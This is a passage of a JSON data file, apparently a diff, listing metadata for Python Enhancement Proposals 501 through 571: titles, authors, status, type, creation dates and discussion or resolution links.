"501": { + "number": 501, + "title": "General purpose template literal strings", + "authors": "Alyssa Coghlan, Nick Humrich", + "discussions_to": "https://discuss.python.org/t/pep-501-reopen-general-purpose-string-template-literals/24625", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2015", + "python_version": "3.12", + "post_history": "`08-Aug-2015 `__, `05-Sep-2015 `__, `09-Mar-2023 `__,", + "resolution": null, + "requires": "701", + "replaces": null, + "superseded_by": "750", + "url": "https://peps.python.org/pep-0501/" + }, + "502": { + "number": 502, + "title": "String Interpolation - Extended Discussion", + "authors": "Mike G. Miller", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "10-Aug-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0502/" + }, + "503": { + "number": 503, + "title": "Simple Repository API", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "04-Sep-2015", + "python_version": null, + "post_history": "04-Sep-2015", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2015-September/026899.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0503/" + }, + "504": { + "number": 504, + "title": "Using the System RNG by default", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "15-Sep-2015", + "python_version": "3.6", + "post_history": "15-Sep-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0504/" + }, + "505": { + "number": 505, + "title": "None-aware operators", + "authors": "Mark E. 
Haase, Steve Dower", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "18-Sep-2015", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0505/" + }, + "506": { + "number": 506, + "title": "Adding A Secrets Module To The Standard Library", + "authors": "Steven D'Aprano", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Sep-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0506/" + }, + "507": { + "number": 507, + "title": "Migrate CPython to Git and GitLab", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Process", + "topic": "", + "created": "30-Sep-2015", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/core-workflow/2016-January/000345.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0507/" + }, + "508": { + "number": 508, + "title": "Dependency specification for Python Software Packages", + "authors": "Robert Collins", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "11-Nov-2015", + "python_version": null, + "post_history": "05-Nov-2015, 16-Nov-2015", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2015-November/027868.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0508/" + }, + "509": { + "number": 509, + "title": "Add a private version to dict", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2016", + "python_version": "3.6", + "post_history": "`08-Jan-2016 `__, `11-Jan-2016 `__, `14-Apr-2016 `__, `19-Apr-2016 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/QFVJV6YQOUSWIYY4FBORY647YCBSCIMQ/", + "requires": null, + "replaces": null, + "superseded_by": "699", + "url": "https://peps.python.org/pep-0509/" + }, + "510": { + "number": 510, + "title": "Specialize functions with guards", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2016", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0510/" + }, + "511": { + "number": 511, + "title": "API for code transformers", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2016", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0511/" + }, + "512": { + "number": 512, + "title": "Migrating from hg.python.org to GitHub", + "authors": "Brett Cannon", + "discussions_to": "core-workflow@python.org", + "status": "Final", + "type": "Process", + "topic": "", + "created": "17-Jan-2015", + "python_version": null, + "post_history": "17-Jan-2016, 19-Jan-2016, 23-Jan-2016", + "resolution": null, + 
"requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0512/" + }, + "513": { + "number": 513, + "title": "A Platform Tag for Portable Linux Built Distributions", + "authors": "Robert T. McGibbon, Nathaniel J. Smith", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Informational", + "topic": "packaging", + "created": "19-Jan-2016", + "python_version": null, + "post_history": "19-Jan-2016, 25-Jan-2016, 29-Jan-2016", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2016-January/028211.html", + "requires": null, + "replaces": null, + "superseded_by": "600", + "url": "https://peps.python.org/pep-0513/" + }, + "514": { + "number": 514, + "title": "Python registration in the Windows registry", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "02-Feb-2016", + "python_version": null, + "post_history": "02-Feb-2016, 01-Mar-2016, 18-Jul-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-July/145697.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0514/" + }, + "515": { + "number": 515, + "title": "Underscores in Numeric Literals", + "authors": "Georg Brandl, Serhiy Storchaka", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2016", + "python_version": "3.6", + "post_history": "10-Feb-2016, 11-Feb-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0515/" + }, + "516": { + "number": 516, + "title": "Build system abstraction for pip/conda etc", + "authors": "Robert Collins, Nathaniel J. Smith", + "discussions_to": "distutils-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "26-Oct-2015", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2017-May/030517.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0516/" + }, + "517": { + "number": 517, + "title": "A build-system independent format for source trees", + "authors": "Nathaniel J. Smith, Thomas Kluyver", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "30-Sep-2015", + "python_version": null, + "post_history": "01-Oct-2015, 25-Oct-2015, 19-May-2017, 11-Sep-2017", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2017-September/031548.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0517/" + }, + "518": { + "number": 518, + "title": "Specifying Minimum Build System Requirements for Python Projects", + "authors": "Brett Cannon, Nathaniel J. 
Smith, Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "10-May-2016", + "python_version": null, + "post_history": "10-May-2016, 11-May-2016, 13-May-2016", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2016-May/028969.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0518/" + }, + "519": { + "number": 519, + "title": "Adding a file system path protocol", + "authors": "Brett Cannon, Koos Zevenhoven", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-May-2016", + "python_version": "3.6", + "post_history": "11-May-2016, 12-May-2016, 13-May-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-May/144646.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0519/" + }, + "520": { + "number": 520, + "title": "Preserving Class Attribute Definition Order", + "authors": "Eric Snow", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "07-Jun-2016", + "python_version": "3.6", + "post_history": "07-Jun-2016, 11-Jun-2016, 20-Jun-2016, 24-Jun-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-June/145442.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0520/" + }, + "521": { + "number": 521, + "title": "Managing global context via 'with' blocks in generators and coroutines", + "authors": "Nathaniel J. Smith", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2015", + "python_version": "3.6", + "post_history": "29-Apr-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0521/" + }, + "522": { + "number": 522, + "title": "Allow BlockingIOError in security sensitive APIs", + "authors": "Alyssa Coghlan, Nathaniel J. 
Smith", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "16-Jun-2016", + "python_version": "3.6", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/security-sig/2016-August/000101.html", + "requires": "506", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0522/" + }, + "523": { + "number": 523, + "title": "Adding a frame evaluation API to CPython", + "authors": "Brett Cannon, Dino Viehland", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-May-2016", + "python_version": "3.6", + "post_history": "16-May-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-August/145937.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0523/" + }, + "524": { + "number": 524, + "title": "Make os.urandom() blocking on Linux", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Jun-2016", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0524/" + }, + "525": { + "number": 525, + "title": "Asynchronous Generators", + "authors": "Yury Selivanov", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Jul-2016", + "python_version": "3.6", + "post_history": "02-Aug-2016, 23-Aug-2016, 01-Sep-2016, 06-Sep-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0525/" + }, + "526": { + "number": 526, + "title": "Syntax for Variable Annotations", + "authors": "Ryan Gonzalez, Philip House, Ivan Levkivskyi, Lisa Roach, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "09-Aug-2016", + "python_version": "3.6", + "post_history": "30-Aug-2016, 02-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146282.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0526/" + }, + "527": { + "number": 527, + "title": "Removing Un(der)used file types/extensions on PyPI", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "23-Aug-2016", + "python_version": null, + "post_history": "23-Aug-2016", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2016-September/029624.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0527/" + }, + "528": { + "number": 528, + "title": "Change Windows console encoding to UTF-8", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Aug-2016", + "python_version": "3.6", + "post_history": "01-Sep-2016, 04-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146278.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0528/" + }, + "529": { + "number": 529, + "title": "Change Windows filesystem encoding to UTF-8", + "authors": "Steve Dower", + "discussions_to": null, + "status": 
"Final", + "type": "Standards Track", + "topic": "", + "created": "27-Aug-2016", + "python_version": "3.6", + "post_history": "01-Sep-2016, 04-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146277.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0529/" + }, + "530": { + "number": 530, + "title": "Asynchronous Comprehensions", + "authors": "Yury Selivanov", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "03-Sep-2016", + "python_version": "3.6", + "post_history": "03-Sep-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0530/" + }, + "531": { + "number": 531, + "title": "Existence checking operators", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2016", + "python_version": "3.7", + "post_history": "28-Oct-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0531/" + }, + "532": { + "number": 532, + "title": "A circuit breaking protocol and binary operators", + "authors": "Alyssa Coghlan, Mark E. Haase", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "30-Oct-2016", + "python_version": "3.8", + "post_history": "05-Nov-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0532/" + }, + "533": { + "number": 533, + "title": "Deterministic cleanup for iterators", + "authors": "Nathaniel J. 
Smith", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "18-Oct-2016", + "python_version": null, + "post_history": "18-Oct-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0533/" + }, + "534": { + "number": 534, + "title": "Improved Errors for Missing Standard Library Modules", + "authors": "Tom\u00e1\u0161 Orsava, Petr Viktorin, Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2016", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0534/" + }, + "535": { + "number": 535, + "title": "Rich comparison chaining", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "12-Nov-2016", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": "532", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0535/" + }, + "536": { + "number": 536, + "title": "Final Grammar for Literal String Interpolation", + "authors": "Philipp Angerer", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "11-Dec-2016", + "python_version": "3.7", + "post_history": "`18-Aug-2016 `__, `23-Dec-2016 `__, `15-Mar-2019 `__", + "resolution": "https://discuss.python.org/t/pep-536-should-be-marked-as-rejected/35226/4", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0536/" + }, + "537": { + "number": 537, + "title": "Python 3.7 Release Schedule", + "authors": "Ned Deily", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "23-Dec-2016", + "python_version": "3.7", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0537/" + }, + "538": { + "number": 538, + "title": "Coercing the legacy C locale to a UTF-8 based locale", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Dec-2016", + "python_version": "3.7", + "post_history": "03-Jan-2017, 07-Jan-2017, 05-Mar-2017, 09-May-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-May/148035.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0538/" + }, + "539": { + "number": 539, + "title": "A New C-API for Thread-Local Storage in CPython", + "authors": "Erik M. 
Bray, Masayuki Yamamoto", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Dec-2016", + "python_version": "3.7", + "post_history": "16-Dec-2016, 31-Aug-2017, 08-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-September/149358.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0539/" + }, + "540": { + "number": 540, + "title": "Add a new UTF-8 Mode", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Jan-2016", + "python_version": "3.7", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151173.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0540/" + }, + "541": { + "number": 541, + "title": "Package Index Name Retention", + "authors": "\u0141ukasz Langa", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "12-Jan-2017", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2018-March/032089.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0541/" + }, + "542": { + "number": 542, + "title": "Dot Notation Assignment In Function Header", + "authors": "Markus Meskanen", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2017", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2019-March/156695.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0542/" + }, + "543": { + "number": 543, + "title": "A Unified TLS API for Python", + "authors": "Cory Benfield, Christian Heimes", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "17-Oct-2016", + "python_version": "3.7", + "post_history": "11-Jan-2017, 19-Jan-2017, 02-Feb-2017, 09-Feb-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "748", + "url": "https://peps.python.org/pep-0543/" + }, + "544": { + "number": 544, + "title": "Protocols: Structural subtyping (static duck typing)", + "authors": "Ivan Levkivskyi, Jukka Lehtosalo, \u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "05-Mar-2017", + "python_version": "3.8", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0544/" + }, + "545": { + "number": 545, + "title": "Python Documentation Translations", + "authors": "Julien Palard, Inada Naoki, Victor Stinner", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "04-Mar-2017", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2017-May/147957.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0545/" + }, + "546": { + "number": 546, + "title": "Backport ssl.MemoryBIO and 
ssl.SSLObject to Python 2.7", + "authors": "Victor Stinner, Cory Benfield", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-May-2017", + "python_version": "2.7", + "post_history": "23-May-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-June/148301.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0546/" + }, + "547": { + "number": 547, + "title": "Running extension modules using the -m option", + "authors": "Marcel Plch, Petr Viktorin", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "25-May-2017", + "python_version": "3.7", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0547/" + }, + "548": { + "number": 548, + "title": "More Flexible Loop Control", + "authors": "R David Murray", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2017", + "python_version": "3.7", + "post_history": "05-Aug-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0548/" + }, + "549": { + "number": 549, + "title": "Instance Descriptors", + "authors": "Larry Hastings", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Sep-2017", + "python_version": "3.7", + "post_history": "04-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0549/" + }, + "550": { + "number": 550, + "title": "Execution Context", + "authors": "Yury Selivanov, Elvis Pranskevichus", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2017", + "python_version": "3.7", + "post_history": "11-Aug-2017, 15-Aug-2017, 18-Aug-2017, 25-Aug-2017, 01-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0550/" + }, + "551": { + "number": 551, + "title": "Security transparency in the Python runtime", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "23-Aug-2017", + "python_version": "3.7", + "post_history": "24-Aug-2017, 28-Aug-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0551/" + }, + "552": { + "number": 552, + "title": "Deterministic pycs", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Sep-2017", + "python_version": "3.7", + "post_history": "07-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-September/149649.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0552/" + }, + "553": { + "number": 553, + "title": "Built-in breakpoint()", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2017", + "python_version": "3.7", + "post_history": "05-Sep-2017, 07-Sep-2017, 13-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-October/149705.html", + 
"requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0553/" + }, + "554": { + "number": 554, + "title": "Multiple Interpreters in the Stdlib", + "authors": "Eric Snow", + "discussions_to": "https://discuss.python.org/t/pep-554-multiple-interpreters-in-the-stdlib/24855", + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2017", + "python_version": "3.13", + "post_history": "`07-Sep-2017 `__, `08-Sep-2017 `__, `13-Sep-2017 `__, `05-Dec-2017 `__, `04-May-2020 `__, `14-Mar-2023 `__, `01-Nov-2023 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "734", + "url": "https://peps.python.org/pep-0554/" + }, + "555": { + "number": 555, + "title": "Context-local variables (contextvars)", + "authors": "Koos Zevenhoven", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "06-Sep-2017", + "python_version": "3.7", + "post_history": "06-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0555/" + }, + "556": { + "number": 556, + "title": "Threaded garbage collection", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "08-Sep-2017", + "python_version": "3.7", + "post_history": "08-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0556/" + }, + "557": { + "number": 557, + "title": "Data Classes", + "authors": "Eric V. Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Jun-2017", + "python_version": "3.7", + "post_history": "08-Sep-2017, 25-Nov-2017, 30-Nov-2017, 01-Dec-2017, 02-Dec-2017, 06-Jan-2018, 04-Mar-2018", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151034.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0557/" + }, + "558": { + "number": 558, + "title": "Defined semantics for locals()", + "authors": "Alyssa Coghlan", + "discussions_to": "python-dev@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "08-Sep-2017", + "python_version": "3.13", + "post_history": "08-Sep-2017, 22-May-2019, 30-May-2019, 30-Dec-2019, 18-Jul-2021, 26-Aug-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0558/" + }, + "559": { + "number": 559, + "title": "Built-in noop()", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Sep-2017", + "python_version": "3.7", + "post_history": "09-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-September/149438.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0559/" + }, + "560": { + "number": 560, + "title": "Core support for typing module and generic types", + "authors": "Ivan Levkivskyi", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "03-Sep-2017", + "python_version": "3.7", + "post_history": "09-Sep-2017, 14-Nov-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151038.html", + "requires": null, + 
"replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0560/" + }, + "561": { + "number": 561, + "title": "Distributing and Packaging Type Information", + "authors": "Ethan Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging, typing", + "created": "09-Sep-2017", + "python_version": "3.7", + "post_history": "10-Sep-2017, 12-Sep-2017, 06-Oct-2017, 26-Oct-2017, 12-Apr-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0561/" + }, + "562": { + "number": 562, + "title": "Module __getattr__ and __dir__", + "authors": "Ivan Levkivskyi", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Sep-2017", + "python_version": "3.7", + "post_history": "09-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151033.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0562/" + }, + "563": { + "number": 563, + "title": "Postponed Evaluation of Annotations", + "authors": "\u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Accepted", + "type": "Standards Track", + "topic": "typing", + "created": "08-Sep-2017", + "python_version": "3.7", + "post_history": "01-Nov-2017, 21-Nov-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151042.html", + "requires": null, + "replaces": null, + "superseded_by": "649", + "url": "https://peps.python.org/pep-0563/" + }, + "564": { + "number": 564, + "title": "Add new time functions with nanosecond resolution", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Oct-2017", + "python_version": "3.7", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2017-October/150046.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0564/" + }, + "565": { + "number": 565, + "title": "Show DeprecationWarning in __main__", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Nov-2017", + "python_version": "3.7", + "post_history": "12-Nov-2017, 25-Nov-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151224.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0565/" + }, + "566": { + "number": 566, + "title": "Metadata for Python Software Packages 2.1", + "authors": "Dustin Ingram", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "01-Dec-2017", + "python_version": "3.x", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2018-February/032014.html", + "requires": null, + "replaces": "345", + "superseded_by": null, + "url": "https://peps.python.org/pep-0566/" + }, + "567": { + "number": 567, + "title": "Context Variables", + "authors": "Yury Selivanov", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Dec-2017", + "python_version": "3.7", + "post_history": "12-Dec-2017, 28-Dec-2017, 16-Jan-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": 
"https://peps.python.org/pep-0567/" + }, + "568": { + "number": 568, + "title": "Generator-sensitivity for Context Variables", + "authors": "Nathaniel J. Smith", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2018", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0568/" + }, + "569": { + "number": 569, + "title": "Python 3.8 Release Schedule", + "authors": "\u0141ukasz Langa", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "27-Jan-2018", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0569/" + }, + "570": { + "number": 570, + "title": "Python Positional-Only Parameters", + "authors": "Larry Hastings, Pablo Galindo, Mario Corchero, Eric N. Vander Weele", + "discussions_to": "https://discuss.python.org/t/pep-570-python-positional-only-parameters/1078", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Jan-2018", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0570/" + }, + "571": { + "number": 571, + "title": "The manylinux2010 Platform Tag", + "authors": "Mark Williams, Geoffrey Thomas, Thomas Kluyver", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + 